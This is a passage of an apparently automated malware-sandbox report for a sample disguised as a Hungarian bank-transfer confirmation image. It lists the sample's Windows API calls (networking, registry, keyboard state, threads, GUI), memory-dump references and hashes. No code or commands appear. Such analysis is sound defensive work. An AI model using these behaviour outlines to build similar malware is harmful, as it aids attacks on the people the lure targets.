                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                                                          • __getptd.LIBCMT ref: 00415253
                                                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                          • _free.LIBCMT ref: 0041529E
                                                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3638380555-0
                                                                                                          • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                          • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 3207048006-625585964
                                                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                          APIs
                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945290962-0
                                                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 1457242333-0
                                                                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 780548581-3081909835
                                                                                                          • Opcode ID: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                          • Opcode Fuzzy Hash: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                          • String ID:
                                                                                                          • API String ID: 4082120231-0
                                                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2027346449-0
                                                                                                          • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                          • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • GetMenu.USER32 ref: 0047A703
                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257027151-0
                                                                                                          • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                          • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                          APIs
                                                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastselect
                                                                                                          • String ID:
                                                                                                          • API String ID: 215497628-0
                                                                                                          • Opcode ID: 848e0cba52365b52d90647beadd6ae35a3a81a52641a937a2f15274f1bbe1e15
                                                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                          • Opcode Fuzzy Hash: 848e0cba52365b52d90647beadd6ae35a3a81a52641a937a2f15274f1bbe1e15
                                                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 00444633
                                                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
